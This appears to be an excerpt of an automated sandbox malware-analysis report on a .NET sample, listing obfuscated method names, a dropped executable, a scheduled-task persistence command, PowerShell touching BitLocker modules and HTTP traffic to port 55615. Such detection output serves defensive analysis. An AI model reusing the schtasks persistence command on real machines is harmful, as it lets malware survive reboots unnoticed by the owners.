                  Source: 0.2.nzLoHpgAln.exe.3e705c8.4.raw.unpack, JbGBKdj6ZIOo4f2BPQ.csHigh entropy of concatenated method names: 'NpFygJGQoy', 'ok3yk3YCOq', 'dHtyQNfrGo', 'B11yEmuFYr', 'i7XyOZetDI', 'MrRybkJ58q', 'o9Ay50huCS', 'W4XyBGlK6A', 'HYHyKiPwKX', 'KF4yZdU6lb'
                  Source: 0.2.nzLoHpgAln.exe.3e705c8.4.raw.unpack, EDIZWacnsQLqU7bbhP.csHigh entropy of concatenated method names: 'dIWleBJaUb', 'fuJlCU5pPg', 'PT9lDBVKdx', 'PSalq1OK3O', 'dyXluwojvM', 'IpBlG2Bi8w', 'OsvlyjvwpG', 'FTClcGgLKf', 'qbJlJr3LlC', 'nsylXUVP8L'
                  Source: 0.2.nzLoHpgAln.exe.3e705c8.4.raw.unpack, DgkowV47Dh3Fxfd92L.csHigh entropy of concatenated method names: 'hfps3nV9Au', 'U26sFkKC7K', 'BnDsThiqJu', 'UShstLseQu', 'QebsrlHGXx', 'QeTsayQhIQ', 'pPZsVs0YpI', 'nEss8RKrgy', 'SDqsjhSJZ0', 'gWEsnyEyGT'
                  Source: 0.2.nzLoHpgAln.exe.3e705c8.4.raw.unpack, fKewcCzIDSttxbv6Cl.csHigh entropy of concatenated method names: 'GZomb8TeAX', 'rcQmBfQBPY', 'RDSmKKcrYt', 'r4gm3oGsfC', 'a3hmFiCyox', 'bkvmt3aMEB', 'jx3mrdiQhQ', 'Skom2cVmJ4', 'nR7mg88OKt', 't5DmkSyAqW'
                  Source: 0.2.nzLoHpgAln.exe.3e705c8.4.raw.unpack, T2nxZyWI6ZVQTBtP96.csHigh entropy of concatenated method names: 'ToString', 'FHbIv7sdct', 'e7OIFs3HOA', 'r5IIThqPl3', 'i2RItKsG4k', 'QOjIr5yarH', 'FvNIaqr3Xo', 'Ud9IVYa8YE', 'DXEI8UseS8', 'LPuIjuyE7K'
                  Source: 0.2.nzLoHpgAln.exe.3e705c8.4.raw.unpack, ssoHYO9CZv0DV6pGUv.csHigh entropy of concatenated method names: 'xGk0BfZgTU', 'gZj0KItla1', 'aUh03ytvB5', 'BNf0FbQD43', 'Dts0tFSCEY', 'Qow0rsiLsP', 'GCF0V1nuab', 'eFg08jmurs', 'qfS0nPubql', 'Ole0v8nioF'
                  Source: 0.2.nzLoHpgAln.exe.3e705c8.4.raw.unpack, fJ02oKDU7jd18ANgNc.csHigh entropy of concatenated method names: 'Dispose', 'EHTH4bcHbO', 'bxFUF2orfZ', 'hdFJYAgReD', 'TrNHLv6dJo', 'dukHz147Cw', 'ProcessDialogKey', 'YZBUAgkowV', 'dDhUH3Fxfd', 'Q2LUUNnxfd'
                  Source: 0.2.nzLoHpgAln.exe.3e705c8.4.raw.unpack, XnxfdvL1wIjOTvPVmK.csHigh entropy of concatenated method names: 'b1lmqgUa6q', 'dtAmu26Sir', 'D3fmGtYCAc', 'wJKmyNZJqJ', 'zTKmsBJyyJ', 'hdYmcQ0id4', 'Next', 'Next', 'Next', 'NextBytes'
                  Source: 0.2.nzLoHpgAln.exe.3e705c8.4.raw.unpack, HFhy6EHAGyTn8yOrkLt.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'pK6mvVucic', 'JtrmpeQLM3', 'Sj9m9uh2y0', 'fIXmfoD3VK', 't3imh4jJWk', 'oeFmWXtOZX', 'bvAmMJDc11'
                  Source: 0.2.nzLoHpgAln.exe.3e705c8.4.raw.unpack, DKJ6PHUd9naUoeJCna.csHigh entropy of concatenated method names: 'swwQFFQbu', 'io5EBuFGC', 'sFfb8pyx1', 'JUl5kqrHa', 'uJXKOHA5M', 'hS3ZZ14sQ', 'k18oVIv0U7RiOT8Orh', 'k5o1tYNsT2YnI8ljjy', 'PvkSr46vN', 'hchmanBLj'
                  Source: 0.2.nzLoHpgAln.exe.3e705c8.4.raw.unpack, tViMi8xroKHTbcHbOM.csHigh entropy of concatenated method names: 'aaEsia69pk', 'zpNsYrnPZM', 'd2Hss3R6Jb', 't53s6HZgj2', 'A1rsRGpI5M', 'UCgs2aWcZJ', 'Dispose', 'pIoSCYEost', 'QAjSD4uYAe', 'fn3SqRpg9H'
                  Source: 0.2.nzLoHpgAln.exe.3e705c8.4.raw.unpack, k27kfyHHonG7KUUcJBK.csHigh entropy of concatenated method names: 'z0WmLhK6XD', 'SdDmzeA4lF', 'tIn6ABldAN', 'RbZ6HWVHCS', 'Hjm6Ub5XDP', 'jKI6lp5iCZ', 'BJe67OKeqo', 'Ds46ejlZDk', 'NgQ6CpOQh7', 'Dcm6DoFoI7'
                  Source: 0.2.nzLoHpgAln.exe.3e705c8.4.raw.unpack, bXPpnuV1cYWsbLvy9E.csHigh entropy of concatenated method names: 'VyuyCViDFQ', 'UgnyquY8I5', 'fT2yGZruLQ', 'zq9GLL2n9k', 'kh4GzwBHBD', 'l9QyAIhQdQ', 'hxvyHf4xuM', 'uKRyUrXavS', 't1qylB4iI0', 'hJ7y7B4cdM'
                  Source: 0.2.nzLoHpgAln.exe.3e705c8.4.raw.unpack, BZ0TvmwFdgLu3v1uns.csHigh entropy of concatenated method names: 'xU6YNrTpfQ', 'MHqYLww1DE', 'IRFSAAuVEM', 'UfiSHJpDRa', 'co0YvMY0kI', 'XS9YpvAFDs', 'tvyY9e2WWn', 'ooMYfhOr4q', 'rKvYhVrSHl', 'kVqYWoZpFC'
                  Source: 10.2.wZWwzQVEakJvEU.exe.4656068.2.raw.unpack, Vs82vkHUR5m9RCYE2bP.csHigh entropy of concatenated method names: 'ToString', 'KfX6BMTyh7', 'xB76Kn2Wpo', 'zuV6Ze8RcL', 'FZw63IgMg0', 'l4a6FPHtQ6', 'MAG6Td04QD', 'kYv6t6R6yY', 'GjZfER1IO7Ml5BMDRtH', 'GL7pWy1Z0kwjW3OdYep'
                  Source: 10.2.wZWwzQVEakJvEU.exe.4656068.2.raw.unpack, lF62eOBaEgEorXmRSl.csHigh entropy of concatenated method names: 'iwRDfGIkgE', 'QjYDh8EXqc', 'SsPDWoPN32', 'GmADMksnIc', 'Is6D1jKVbG', 'I5kDwCg0R9', 'YkMDxlMml4', 'cqUDNP7QiU', 'aEPD4EPsAy', 'FH7DL0Asye'
                  Source: 10.2.wZWwzQVEakJvEU.exe.4656068.2.raw.unpack, Dqnxs234kMblUpWIWe.csHigh entropy of concatenated method names: 'THiGewLSWx', 'xvbGDWOODP', 'cWbGuULGWK', 'naCGy2oX6x', 'd7vGcBa6cO', 'eyou1dQ4pM', 'kbnuwftVYT', 'PYuuxbMh1B', 'XjeuN4ZoT4', 'k4Cu4iBqPt'
                  Source: 10.2.wZWwzQVEakJvEU.exe.4656068.2.raw.unpack, R9ihZtK1dSap2DSgRG.csHigh entropy of concatenated method names: 'xH1qEPtVAl', 'gMtqbbJkpd', 'JlpqB25eCM', 'NoiqKaCu0X', 'DCPqiDF8Xt', 'BbBqI1vGgK', 'nZwqYiIpom', 'VETqSJfEol', 'sLqqseFf6k', 'zjNqmjeRt4'
                  Source: 10.2.wZWwzQVEakJvEU.exe.4656068.2.raw.unpack, rdDn9AZRble9iQ9Uqj.csHigh entropy of concatenated method names: 'EequOEL5lC', 'NbIu51eamH', 'qyuqTnnIpG', 'M2Qqt1KgVv', 'Op1qrcmPaR', 'JuFqabP01V', 'QoQqV1PoE2', 'grQq8864NF', 'Np6qjdLkrD', 'BpCqnYSTOk'
                  Source: 10.2.wZWwzQVEakJvEU.exe.4656068.2.raw.unpack, hKo5edfWLak4Bbqtne.csHigh entropy of concatenated method names: 'uDMin9kJ4j', 'TwiipFCVU9', 'yBAiflrCy8', 'jJHihWOmfb', 'WaDiFLfcme', 'O5kiTrdenj', 'nSYitbxRXp', 'dd4irfONIq', 'AwmiaheyoW', 'QXwiVnSATc'
                  Source: 10.2.wZWwzQVEakJvEU.exe.4656068.2.raw.unpack, WTdydw7kwQos9Ag2hA.csHigh entropy of concatenated method names: 'XnJHyF62eO', 'KEgHcEorXm', 'I1dHXSap2D', 'rgRHdGsdDn', 'z9UHiqjBqn', 'Vs2HI4kMbl', 'FBdE0xi06QEIGbChRo', 'zIcGsgCEAFGoBOwjJW', 'OcsHH4wRHq', 'm1eHlQwcuZ'
                  Source: 10.2.wZWwzQVEakJvEU.exe.4656068.2.raw.unpack, c2189dMeFcQwlCkDNo.csHigh entropy of concatenated method names: 'tycYXgX4IL', 'xcAYdeKiZv', 'ToString', 'vmMYCTO6V4', 'DoYYDU59PA', 'wuwYqhlbkT', 'MRyYulAB1T', 'NnnYGlmcnN', 'pl7YyLS7WE', 'EolYctOKcZ'
                  Source: 10.2.wZWwzQVEakJvEU.exe.4656068.2.raw.unpack, JbGBKdj6ZIOo4f2BPQ.csHigh entropy of concatenated method names: 'NpFygJGQoy', 'ok3yk3YCOq', 'dHtyQNfrGo', 'B11yEmuFYr', 'i7XyOZetDI', 'MrRybkJ58q', 'o9Ay50huCS', 'W4XyBGlK6A', 'HYHyKiPwKX', 'KF4yZdU6lb'
                  Source: 10.2.wZWwzQVEakJvEU.exe.4656068.2.raw.unpack, EDIZWacnsQLqU7bbhP.csHigh entropy of concatenated method names: 'dIWleBJaUb', 'fuJlCU5pPg', 'PT9lDBVKdx', 'PSalq1OK3O', 'dyXluwojvM', 'IpBlG2Bi8w', 'OsvlyjvwpG', 'FTClcGgLKf', 'qbJlJr3LlC', 'nsylXUVP8L'
                  Source: 10.2.wZWwzQVEakJvEU.exe.4656068.2.raw.unpack, DgkowV47Dh3Fxfd92L.csHigh entropy of concatenated method names: 'hfps3nV9Au', 'U26sFkKC7K', 'BnDsThiqJu', 'UShstLseQu', 'QebsrlHGXx', 'QeTsayQhIQ', 'pPZsVs0YpI', 'nEss8RKrgy', 'SDqsjhSJZ0', 'gWEsnyEyGT'
                  Source: 10.2.wZWwzQVEakJvEU.exe.4656068.2.raw.unpack, fKewcCzIDSttxbv6Cl.csHigh entropy of concatenated method names: 'GZomb8TeAX', 'rcQmBfQBPY', 'RDSmKKcrYt', 'r4gm3oGsfC', 'a3hmFiCyox', 'bkvmt3aMEB', 'jx3mrdiQhQ', 'Skom2cVmJ4', 'nR7mg88OKt', 't5DmkSyAqW'
                  Source: 10.2.wZWwzQVEakJvEU.exe.4656068.2.raw.unpack, T2nxZyWI6ZVQTBtP96.csHigh entropy of concatenated method names: 'ToString', 'FHbIv7sdct', 'e7OIFs3HOA', 'r5IIThqPl3', 'i2RItKsG4k', 'QOjIr5yarH', 'FvNIaqr3Xo', 'Ud9IVYa8YE', 'DXEI8UseS8', 'LPuIjuyE7K'
                  Source: 10.2.wZWwzQVEakJvEU.exe.4656068.2.raw.unpack, ssoHYO9CZv0DV6pGUv.csHigh entropy of concatenated method names: 'xGk0BfZgTU', 'gZj0KItla1', 'aUh03ytvB5', 'BNf0FbQD43', 'Dts0tFSCEY', 'Qow0rsiLsP', 'GCF0V1nuab', 'eFg08jmurs', 'qfS0nPubql', 'Ole0v8nioF'
                  Source: 10.2.wZWwzQVEakJvEU.exe.4656068.2.raw.unpack, fJ02oKDU7jd18ANgNc.csHigh entropy of concatenated method names: 'Dispose', 'EHTH4bcHbO', 'bxFUF2orfZ', 'hdFJYAgReD', 'TrNHLv6dJo', 'dukHz147Cw', 'ProcessDialogKey', 'YZBUAgkowV', 'dDhUH3Fxfd', 'Q2LUUNnxfd'
                  Source: 10.2.wZWwzQVEakJvEU.exe.4656068.2.raw.unpack, XnxfdvL1wIjOTvPVmK.csHigh entropy of concatenated method names: 'b1lmqgUa6q', 'dtAmu26Sir', 'D3fmGtYCAc', 'wJKmyNZJqJ', 'zTKmsBJyyJ', 'hdYmcQ0id4', 'Next', 'Next', 'Next', 'NextBytes'
                  Source: 10.2.wZWwzQVEakJvEU.exe.4656068.2.raw.unpack, HFhy6EHAGyTn8yOrkLt.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'pK6mvVucic', 'JtrmpeQLM3', 'Sj9m9uh2y0', 'fIXmfoD3VK', 't3imh4jJWk', 'oeFmWXtOZX', 'bvAmMJDc11'
                  Source: 10.2.wZWwzQVEakJvEU.exe.4656068.2.raw.unpack, DKJ6PHUd9naUoeJCna.csHigh entropy of concatenated method names: 'swwQFFQbu', 'io5EBuFGC', 'sFfb8pyx1', 'JUl5kqrHa', 'uJXKOHA5M', 'hS3ZZ14sQ', 'k18oVIv0U7RiOT8Orh', 'k5o1tYNsT2YnI8ljjy', 'PvkSr46vN', 'hchmanBLj'
                  Source: 10.2.wZWwzQVEakJvEU.exe.4656068.2.raw.unpack, tViMi8xroKHTbcHbOM.csHigh entropy of concatenated method names: 'aaEsia69pk', 'zpNsYrnPZM', 'd2Hss3R6Jb', 't53s6HZgj2', 'A1rsRGpI5M', 'UCgs2aWcZJ', 'Dispose', 'pIoSCYEost', 'QAjSD4uYAe', 'fn3SqRpg9H'
                  Source: 10.2.wZWwzQVEakJvEU.exe.4656068.2.raw.unpack, k27kfyHHonG7KUUcJBK.csHigh entropy of concatenated method names: 'z0WmLhK6XD', 'SdDmzeA4lF', 'tIn6ABldAN', 'RbZ6HWVHCS', 'Hjm6Ub5XDP', 'jKI6lp5iCZ', 'BJe67OKeqo', 'Ds46ejlZDk', 'NgQ6CpOQh7', 'Dcm6DoFoI7'
                  Source: 10.2.wZWwzQVEakJvEU.exe.4656068.2.raw.unpack, bXPpnuV1cYWsbLvy9E.csHigh entropy of concatenated method names: 'VyuyCViDFQ', 'UgnyquY8I5', 'fT2yGZruLQ', 'zq9GLL2n9k', 'kh4GzwBHBD', 'l9QyAIhQdQ', 'hxvyHf4xuM', 'uKRyUrXavS', 't1qylB4iI0', 'hJ7y7B4cdM'
                  Source: 10.2.wZWwzQVEakJvEU.exe.4656068.2.raw.unpack, BZ0TvmwFdgLu3v1uns.csHigh entropy of concatenated method names: 'xU6YNrTpfQ', 'MHqYLww1DE', 'IRFSAAuVEM', 'UfiSHJpDRa', 'co0YvMY0kI', 'XS9YpvAFDs', 'tvyY9e2WWn', 'ooMYfhOr4q', 'rKvYhVrSHl', 'kVqYWoZpFC'
                  Source: 10.2.wZWwzQVEakJvEU.exe.46b2688.5.raw.unpack, Vs82vkHUR5m9RCYE2bP.csHigh entropy of concatenated method names: 'ToString', 'KfX6BMTyh7', 'xB76Kn2Wpo', 'zuV6Ze8RcL', 'FZw63IgMg0', 'l4a6FPHtQ6', 'MAG6Td04QD', 'kYv6t6R6yY', 'GjZfER1IO7Ml5BMDRtH', 'GL7pWy1Z0kwjW3OdYep'
                  Source: 10.2.wZWwzQVEakJvEU.exe.46b2688.5.raw.unpack, lF62eOBaEgEorXmRSl.csHigh entropy of concatenated method names: 'iwRDfGIkgE', 'QjYDh8EXqc', 'SsPDWoPN32', 'GmADMksnIc', 'Is6D1jKVbG', 'I5kDwCg0R9', 'YkMDxlMml4', 'cqUDNP7QiU', 'aEPD4EPsAy', 'FH7DL0Asye'
                  Source: 10.2.wZWwzQVEakJvEU.exe.46b2688.5.raw.unpack, Dqnxs234kMblUpWIWe.csHigh entropy of concatenated method names: 'THiGewLSWx', 'xvbGDWOODP', 'cWbGuULGWK', 'naCGy2oX6x', 'd7vGcBa6cO', 'eyou1dQ4pM', 'kbnuwftVYT', 'PYuuxbMh1B', 'XjeuN4ZoT4', 'k4Cu4iBqPt'
                  Source: 10.2.wZWwzQVEakJvEU.exe.46b2688.5.raw.unpack, R9ihZtK1dSap2DSgRG.csHigh entropy of concatenated method names: 'xH1qEPtVAl', 'gMtqbbJkpd', 'JlpqB25eCM', 'NoiqKaCu0X', 'DCPqiDF8Xt', 'BbBqI1vGgK', 'nZwqYiIpom', 'VETqSJfEol', 'sLqqseFf6k', 'zjNqmjeRt4'
                  Source: 10.2.wZWwzQVEakJvEU.exe.46b2688.5.raw.unpack, rdDn9AZRble9iQ9Uqj.csHigh entropy of concatenated method names: 'EequOEL5lC', 'NbIu51eamH', 'qyuqTnnIpG', 'M2Qqt1KgVv', 'Op1qrcmPaR', 'JuFqabP01V', 'QoQqV1PoE2', 'grQq8864NF', 'Np6qjdLkrD', 'BpCqnYSTOk'
                  Source: 10.2.wZWwzQVEakJvEU.exe.46b2688.5.raw.unpack, hKo5edfWLak4Bbqtne.csHigh entropy of concatenated method names: 'uDMin9kJ4j', 'TwiipFCVU9', 'yBAiflrCy8', 'jJHihWOmfb', 'WaDiFLfcme', 'O5kiTrdenj', 'nSYitbxRXp', 'dd4irfONIq', 'AwmiaheyoW', 'QXwiVnSATc'
                  Source: 10.2.wZWwzQVEakJvEU.exe.46b2688.5.raw.unpack, WTdydw7kwQos9Ag2hA.csHigh entropy of concatenated method names: 'XnJHyF62eO', 'KEgHcEorXm', 'I1dHXSap2D', 'rgRHdGsdDn', 'z9UHiqjBqn', 'Vs2HI4kMbl', 'FBdE0xi06QEIGbChRo', 'zIcGsgCEAFGoBOwjJW', 'OcsHH4wRHq', 'm1eHlQwcuZ'
                  Source: 10.2.wZWwzQVEakJvEU.exe.46b2688.5.raw.unpack, c2189dMeFcQwlCkDNo.csHigh entropy of concatenated method names: 'tycYXgX4IL', 'xcAYdeKiZv', 'ToString', 'vmMYCTO6V4', 'DoYYDU59PA', 'wuwYqhlbkT', 'MRyYulAB1T', 'NnnYGlmcnN', 'pl7YyLS7WE', 'EolYctOKcZ'
                  Source: 10.2.wZWwzQVEakJvEU.exe.46b2688.5.raw.unpack, JbGBKdj6ZIOo4f2BPQ.csHigh entropy of concatenated method names: 'NpFygJGQoy', 'ok3yk3YCOq', 'dHtyQNfrGo', 'B11yEmuFYr', 'i7XyOZetDI', 'MrRybkJ58q', 'o9Ay50huCS', 'W4XyBGlK6A', 'HYHyKiPwKX', 'KF4yZdU6lb'
                  Source: 10.2.wZWwzQVEakJvEU.exe.46b2688.5.raw.unpack, EDIZWacnsQLqU7bbhP.csHigh entropy of concatenated method names: 'dIWleBJaUb', 'fuJlCU5pPg', 'PT9lDBVKdx', 'PSalq1OK3O', 'dyXluwojvM', 'IpBlG2Bi8w', 'OsvlyjvwpG', 'FTClcGgLKf', 'qbJlJr3LlC', 'nsylXUVP8L'
                  Source: 10.2.wZWwzQVEakJvEU.exe.46b2688.5.raw.unpack, DgkowV47Dh3Fxfd92L.csHigh entropy of concatenated method names: 'hfps3nV9Au', 'U26sFkKC7K', 'BnDsThiqJu', 'UShstLseQu', 'QebsrlHGXx', 'QeTsayQhIQ', 'pPZsVs0YpI', 'nEss8RKrgy', 'SDqsjhSJZ0', 'gWEsnyEyGT'
                  Source: 10.2.wZWwzQVEakJvEU.exe.46b2688.5.raw.unpack, fKewcCzIDSttxbv6Cl.csHigh entropy of concatenated method names: 'GZomb8TeAX', 'rcQmBfQBPY', 'RDSmKKcrYt', 'r4gm3oGsfC', 'a3hmFiCyox', 'bkvmt3aMEB', 'jx3mrdiQhQ', 'Skom2cVmJ4', 'nR7mg88OKt', 't5DmkSyAqW'
                  Source: 10.2.wZWwzQVEakJvEU.exe.46b2688.5.raw.unpack, T2nxZyWI6ZVQTBtP96.csHigh entropy of concatenated method names: 'ToString', 'FHbIv7sdct', 'e7OIFs3HOA', 'r5IIThqPl3', 'i2RItKsG4k', 'QOjIr5yarH', 'FvNIaqr3Xo', 'Ud9IVYa8YE', 'DXEI8UseS8', 'LPuIjuyE7K'
                  Source: 10.2.wZWwzQVEakJvEU.exe.46b2688.5.raw.unpack, ssoHYO9CZv0DV6pGUv.csHigh entropy of concatenated method names: 'xGk0BfZgTU', 'gZj0KItla1', 'aUh03ytvB5', 'BNf0FbQD43', 'Dts0tFSCEY', 'Qow0rsiLsP', 'GCF0V1nuab', 'eFg08jmurs', 'qfS0nPubql', 'Ole0v8nioF'
                  Source: 10.2.wZWwzQVEakJvEU.exe.46b2688.5.raw.unpack, fJ02oKDU7jd18ANgNc.csHigh entropy of concatenated method names: 'Dispose', 'EHTH4bcHbO', 'bxFUF2orfZ', 'hdFJYAgReD', 'TrNHLv6dJo', 'dukHz147Cw', 'ProcessDialogKey', 'YZBUAgkowV', 'dDhUH3Fxfd', 'Q2LUUNnxfd'
                  Source: 10.2.wZWwzQVEakJvEU.exe.46b2688.5.raw.unpack, XnxfdvL1wIjOTvPVmK.csHigh entropy of concatenated method names: 'b1lmqgUa6q', 'dtAmu26Sir', 'D3fmGtYCAc', 'wJKmyNZJqJ', 'zTKmsBJyyJ', 'hdYmcQ0id4', 'Next', 'Next', 'Next', 'NextBytes'
                  Source: 10.2.wZWwzQVEakJvEU.exe.46b2688.5.raw.unpack, HFhy6EHAGyTn8yOrkLt.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'pK6mvVucic', 'JtrmpeQLM3', 'Sj9m9uh2y0', 'fIXmfoD3VK', 't3imh4jJWk', 'oeFmWXtOZX', 'bvAmMJDc11'
                  Source: 10.2.wZWwzQVEakJvEU.exe.46b2688.5.raw.unpack, DKJ6PHUd9naUoeJCna.csHigh entropy of concatenated method names: 'swwQFFQbu', 'io5EBuFGC', 'sFfb8pyx1', 'JUl5kqrHa', 'uJXKOHA5M', 'hS3ZZ14sQ', 'k18oVIv0U7RiOT8Orh', 'k5o1tYNsT2YnI8ljjy', 'PvkSr46vN', 'hchmanBLj'
                  Source: 10.2.wZWwzQVEakJvEU.exe.46b2688.5.raw.unpack, tViMi8xroKHTbcHbOM.csHigh entropy of concatenated method names: 'aaEsia69pk', 'zpNsYrnPZM', 'd2Hss3R6Jb', 't53s6HZgj2', 'A1rsRGpI5M', 'UCgs2aWcZJ', 'Dispose', 'pIoSCYEost', 'QAjSD4uYAe', 'fn3SqRpg9H'
                  Source: 10.2.wZWwzQVEakJvEU.exe.46b2688.5.raw.unpack, k27kfyHHonG7KUUcJBK.csHigh entropy of concatenated method names: 'z0WmLhK6XD', 'SdDmzeA4lF', 'tIn6ABldAN', 'RbZ6HWVHCS', 'Hjm6Ub5XDP', 'jKI6lp5iCZ', 'BJe67OKeqo', 'Ds46ejlZDk', 'NgQ6CpOQh7', 'Dcm6DoFoI7'
                  Source: 10.2.wZWwzQVEakJvEU.exe.46b2688.5.raw.unpack, bXPpnuV1cYWsbLvy9E.csHigh entropy of concatenated method names: 'VyuyCViDFQ', 'UgnyquY8I5', 'fT2yGZruLQ', 'zq9GLL2n9k', 'kh4GzwBHBD', 'l9QyAIhQdQ', 'hxvyHf4xuM', 'uKRyUrXavS', 't1qylB4iI0', 'hJ7y7B4cdM'
                  Source: 10.2.wZWwzQVEakJvEU.exe.46b2688.5.raw.unpack, BZ0TvmwFdgLu3v1uns.csHigh entropy of concatenated method names: 'xU6YNrTpfQ', 'MHqYLww1DE', 'IRFSAAuVEM', 'UfiSHJpDRa', 'co0YvMY0kI', 'XS9YpvAFDs', 'tvyY9e2WWn', 'ooMYfhOr4q', 'rKvYhVrSHl', 'kVqYWoZpFC'
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeFile created: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeJump to dropped file

                  Boot Survival

                  barindex
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\wZWwzQVEakJvEU" /XML "C:\Users\user\AppData\Local\Temp\tmpC18A.tmp"

                  Hooking and other Techniques for Hiding and Protection

                  barindex
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 55615
                  Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49736
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 55615
                  Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49736
                  Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49736
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 55615
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 55615
                  Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49739
                  Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49738
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 55615
                  Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49741
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 55615
                  Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49739
                  Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49739
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 55615
                  Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49748
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 55615
                  Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49749
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
